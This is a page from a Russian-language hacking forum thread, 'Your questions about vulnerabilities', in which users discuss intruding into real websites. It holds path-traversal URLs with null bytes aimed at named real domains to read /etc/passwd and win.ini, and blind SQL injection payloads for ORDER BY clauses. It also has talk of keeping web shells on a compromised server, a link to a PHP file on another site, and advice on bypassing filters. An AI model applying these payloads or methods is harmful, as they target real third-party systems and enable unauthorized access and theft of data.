Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    Клац
     
    1 person likes this.
  2. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Скрипт сработал и повис на некоторое время сервак, но когда перезагрузился файлы откатились.
    Искал-искал и так не понял - откуда они подгружаются.
    Есть какие-нибудь идеи? :)
    Так же скрипты из строки браузера не запускаются. Т.е. тупо не исполняются :O
    Приходится использовать Execute: php 1.php
    Вот.
    А, ну и ещё одно. Как-то странно происходит процесс восстановления данных.
    Обновляются файлы до каких-то непонятных времён, т.е. мой шелл восстанавливается из удалённых, а шеллы в других папках не восстанавливаются, но заливались все в одно и тоже время.

    Заметил, что обновляются они по разному:
    В одно время в .htaccess есть доп. строки
    HTML:
    <FilesMatch "^\.">
      Deny from all
    </FilesMatch>
    <FilesMatch "\.\.">
      Deny from all
    </FilesMatch>
    В другое время их нету :confused:
     
    #23322 Aniweste, 18 Jun 2014
    Last edited: 18 Jun 2014
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    а зачем тебе идеи? отредачит файл - запустил скрипт, сервак повис, ребнулся и вместе с ним и кеш обновился, что еще для счастья нада?
     
  4. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Сервак повис -> ребутнулся -> восстановил все файлы откуда-то в их первоначальный вид.
     
  5. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Через соседа, где file_priv Y, например поддомен uha .
    Mq=off
    http://fisher.spb.ru/php.php
     
    _________________________
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    та не, не в первоначальный вид, такого не может быть, песле перезагрузки он считывает файлы и помещает результат в кеш, тоесть в кеше окажутся последние изменения файлов
     
  7. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Теперь сервак не падает.
    Он выдаёт 408 на несколько секунд и дальше происходит одно из двух:
    1. Либо восстанавливаются первоначальные файлы, либо
    2. Ничего не происходит и новый текст так и не отображается :rolleyes:
     
  8. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Помогите пожалуйста.
    Не понимаю в чём дело.

    Code:
    http://dviu.ranepa.ru/index.php?page=..\..\..\..\..\..\..\windows\win.ini%00
    
    http://www.lhc-facts.ch/index.php?page=../../../../../../../../../../etc/hosts%00
    
    http://www.spaskrug-osetia.ru/index.php?page=../../../../../../../etc/hosts%00
    
    http://klenovskoe.ru/index.php?page=../../../../../../../../../../etc/passwd%00
     
    #23328 psihoz26, 19 Jun 2014
    Last edited: 19 Jun 2014
  9. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    В чем может быть причина того, что на некоторых сайтах запрос:
    Code:
    order=1 rlike (SELECT (case when(1=1) then (select 1 union select 2) else 1 end))%23
    
    всё время возвращает пустой результат (при 1=1 или 1=0).
    Инъекция в order by.
     
  10. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    XAMEHA, при числе записи = 1 всё нормально:
    Code:
    select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=0) then 0x28 else 1 end))
    # Вернет 1
    select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=1) then 0x28 else 1 end))
    # Вернет #1139 - Got error 'parentheses not balanced' from regexp
    
     
  11. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    XAMEHA, спасибо за ссылку, так работает:
    Code:
    order=min(0 rlike if((%s),1,0x00))#
    
     
    1 person likes this.
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    никто не в курсе как через БД джомлы найти урл от сайта(кроме как искать сайт по контенту в БД), а то чёт ничего путёвого там ненахожу
     
  13. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Попробуй так:
    Code:
    SELECT name FROM #__menu LIMIT 0,1
    
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    не, там только титлы
     
  15. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    А в колонке link?
    SELECT link FROM #__menu
     
    1 person likes this.
  16. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    При фильтрации скобок в boolean based blind sql injection есть вектора?
     
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Заготовок, которые можно подставить, нет. Раскрутить возможно.

    Обычно используются конструкции с union select, where, regexp и case (blind sql-injection),.
     
    #23337 randman, 21 Jun 2014
    Last edited: 21 Jun 2014
    1 person likes this.
  18. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Если имеются ввиду эти скобки <> то блайнд с полным перебором только можно воспроизвести
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    URL Encode и Double Url Encode забыл упомянуть.
     
    _________________________
    2 people like this.
  20. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Новонайденный вектор:

     
    2 people like this.
Thread Status:
Not open for further replies.